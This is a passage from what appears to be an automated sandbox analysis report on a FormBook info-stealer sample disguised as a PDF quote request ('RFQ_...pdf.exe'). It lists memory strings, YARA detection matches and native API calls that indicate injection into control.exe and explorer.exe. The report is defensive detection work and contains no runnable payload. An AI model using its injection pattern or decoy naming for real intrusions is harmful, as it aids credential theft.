          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: http://business.google.com/website/rooted-with-love/pe0r/&quot;
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.660312730.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/localservices
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://business.google.com
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://lh5.googleusercontent.com/tnT1qBMzmyLgRDNYg3gq78quEpuZVERk849E090SPkl3uZ90NtOdF0DdK28eDthwrR
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://rootedwithlovejax.com
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://schema.org/LocalBusiness
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://workspace.google.com
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/maps/dir//Rooted
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/_/mss/boq-geo/_/js/k=boq-geo.GeoMerchantPrestoSiteUi.en_US.H3HiHVucosI.es5.O
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_004182DC NtClose,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A0B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09A10 NtQuerySection,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A0A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A0AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09560 NtWriteFile,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A0A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09760 NtOpenProcess,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A09770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A0A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047DAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047DA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047DA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047DB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047DA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_007181B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00718260 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_007182E0 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00718390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_007182DC NtClose,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_004046A7
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00408C4B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00408C50
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041BD8E
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041C5A1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041B5A1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A920A8
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DB090
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F20A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A928EC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9E824
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81002
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CF900
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E4120
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A922AE
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7FA2B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FEBB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A803DA
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8DBD2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A92B28
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAB40
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D841F
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8D466
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A925DD
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DD5E0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A92D07
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C0D20
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A91D55
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A92EF7
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E6E30
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8D616
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A91FF1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9DFCE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485D466
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04790D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048625DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04862D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AD5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04861D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B6E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04862EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485D616
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486DFCE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04861FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048620A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048628EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851002
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486E824
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AB090
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479F900
